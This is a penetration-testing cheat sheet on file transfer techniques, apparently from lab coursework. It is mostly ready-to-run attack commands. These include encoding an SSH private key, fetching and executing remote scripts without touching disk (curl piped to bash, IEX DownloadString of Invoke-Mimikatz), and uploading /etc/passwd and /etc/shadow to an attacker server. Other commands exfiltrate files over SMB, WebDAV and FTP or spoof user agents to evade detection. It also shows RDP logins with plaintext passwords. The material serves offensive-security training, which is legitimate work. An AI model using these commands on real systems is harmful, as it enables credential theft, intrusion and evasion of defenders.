File Transfers
Download Operations
Terminal String Copy & Paste
Linux Encode Base64
cat id_rsa |base64 -w 0;echo

Windows Decode & Write Base64
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING"))

Web Downloads with Wget & cURL
Download a File Using wget
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Download with wget
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download a File Using cURL
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Download with cURL
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Download with Bash (/dev/tcp)
Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80

HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the Response
cat <&3

PowerShell Web Downloads
DownloadFile Method
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

DownloadString - Fileless Method
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Invoke-WebRequest
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

iwr
, curl
, and wget
instead of the Invoke-WebRequest
full nameCommon Errors with PowerShell

Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
SMB Downloads
Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare

Copy a File from the SMB Server
copy \\192.168.220.133\share\nc.exe


Create the SMB Server with Username & Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Mount the SMB Server with Username and Password
net use n: \\192.168.220.133\share /user:test test

copy filename \\IP\sharename
.FTP Downloads
Installing the FTP Server Python3 Module - pyftpdlib
sudo pip3 install pyftpdlib

Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21

Transfering Files from an FTP Server Using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

Command File for FTP Client To Download File
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Upload Operations
Terminal String Copy & Paste
Windows Encode & Write Base64
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

Linux Decode Base64
echo Base64string | base64 -d > hosts

Web Uploads with cURL
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

PowerShell Web Uploads
Installing a Configured WebServer with Upload
pip3 install uploadserver
python3 -m uploadserver

PowerShell Script to Upload a File to Python Upload Server
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

PowerShell Base64 Web Upload
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

nc -lvnp 8000

echo <base64> | base64 -d -w 0 > hosts
SMB Uploads

WebDav
. When you use SMB
, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTPInstalling WebDav Python modules
sudo pip3 install wsgidav cheroot

Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connecting to the Webdav Share
dir \\192.168.49.128\DavWWWRoot

Uploading Files using SMB
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

FTP Uploads
sudo python3 -m pyftpdlib --port 21 --write

--write
to allow clients to upload files to our attack hostPowerShell Upload File
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Command File for FTP Client to Upload File
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Mounting a Linux Folder With RDP
Mounting Using rdesktop
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

Mounting Using xfreerdp
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Evading Detection
Listing out User Agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Request with Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

Transferring File with GfxDownloadWrapper.exe
GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Last updated